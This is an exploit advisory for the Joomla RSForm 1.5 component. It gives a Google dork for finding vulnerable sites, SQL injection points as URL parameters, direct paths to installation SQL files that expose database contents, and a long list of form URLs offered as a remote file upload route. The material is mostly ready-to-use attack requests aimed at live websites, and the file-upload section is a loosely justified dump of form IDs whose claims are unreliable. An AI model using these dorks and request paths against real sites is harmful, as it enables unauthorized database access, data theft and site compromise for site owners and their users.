#################################################################### # Exploit Title : Joomla RSForm Components 1.5 SQL Injection / Database Disclosure / Remote File Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 03/02/2019 # Vendor Homepage : rsjoomla.com # Software Download Link : rsjoomla.com/free-downloads/download.html?path= com_forme%2FComponent%2Fcom_formeJ15.zip # Software Information Link : rsjoomla.com/joomla-extensions/rsform.html # Software Version : 1.5 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_rsform'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-200 [ Information Exposure ] CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** RSForm! allows you to build forms for Joomla! #################################################################### # Impact : *********** * Joomla RSForm Components 1.5 for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. * This Software prone to an information exposure/database disclosure vulnerability. Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database. * Any remote user may download the database files and gain access to sensitive information including unencrypted authentication credentials this software has remote file upload vulnerability. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_rsform&Itemid=[SQL Injection] /index.php?option=com_rsform&view=rsform&Itemid=[SQL Injection] /index.php?option=com_rsform&view=rsform&formId=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_rsform&formId=[ID-NUMBER]&asset=[SQL Injection] #################################################################### # Database Disclosure Exploit : *************************** /administrator/components/com_rsform/tmp/rsform-install.sql /administrator/components/com_rsform/tmp/rsform-uninstall.sql /administrator/components/com_rsform/tmp/sample-install.sql #################################################################### # Remote File Upload/Insert File Exploit : ************************************ /index.php?option=com_rsform&formId=8&form[PositionTitle]=Admin /index.php?option=com_rsform&formId=[THIS-ID-NUMBER-ALWAYS-CHANGES] /index.php?option=com_rsform&formId=4 /index.php?option=com_rsform&formId=3 /index.php?option=com_rsform&view=rsform&formId=4 /index.php?option=com_rsform&view=rsform&Itemid=6 /index.php?option=com_rsform&view=rsform&Itemid=37 /index.php/en/?option=com_rsform&view=rsform&formId=3 /index.php?option=com_rsform&view=rsform&formId=5 /index.php?option=com_rsform&view=rsform&formId=6&Itemid=236 /index.php?option=com_rsform&view=rsform&formId=30 /index.php?option=com_rsform&view=rsform&formId=1&Itemid=508 /index.php?option=com_rsform&view=rsform&formId=3&Itemid=223&lang=en /index.php?option=com_rsform&view=rsform&formId=39&Itemid=1084 /index.php?option=com_rsform&view=rsform&formId=1&Itemid=444 /index.php?option=com_rsform&view=rsform&formId=3&Itemid=178 /index.php?option=com_rsform&view=rsform&Itemid=136&lang=en # Directory File Path : ******************** /index.php?option=com_rsform&formId=[ID-NUMBER]&tmpl=component&file=[YOUR-FILE-HERE.txt] /index.php?option=com_rsform&view=rsform&formId=[ID-NUMBER]&submissionId=[FIND-SUBMISSION-ID] or search your file here. /administrator/components/com_rsform/...... ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################